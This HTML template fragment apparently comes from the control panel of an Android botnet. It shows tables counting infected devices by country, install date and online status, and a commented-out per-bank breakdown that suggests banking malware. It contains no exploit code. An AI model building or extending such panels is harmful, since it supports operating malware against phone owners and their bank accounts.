
<div class="row">
	<!-- left pane -->
	<div class="col-lg-6">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Statistics by last seen time%TAG_TEXT%</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="100">Country</th>
								<th>Total</th>
								<th>Installed today</th>
								<th title='Seen in last hour'>Alive</th>
								<th>Offline</th>
								<th title='Offline more than 48h'>Dead</th>
							</tr>
							%BOT_STATS_COUNTRY%
						</table>
						
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="col-lg-6">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Top by lifetime%TAG_TEXT%</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width=30>Android</th>
								<th>Time</th>
							</tr>
							%BOT_STATS_LIFETIME%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>
<!--
	<div class="col-lg-3">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Statistics by country/banks</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="30">Country</th>
								<th>Banks</th>
							</tr>
							%BOT_STATS_BANKS%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>
-->
</div> <!-- end row -->

<!--
<div class="row">

	<div class="col-lg-12">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Statistics by tags</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="30">Tag</th>
								<th>Countries</th>
							</tr>
							%BOT_STATS_TAG%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>
	
</div>
-->














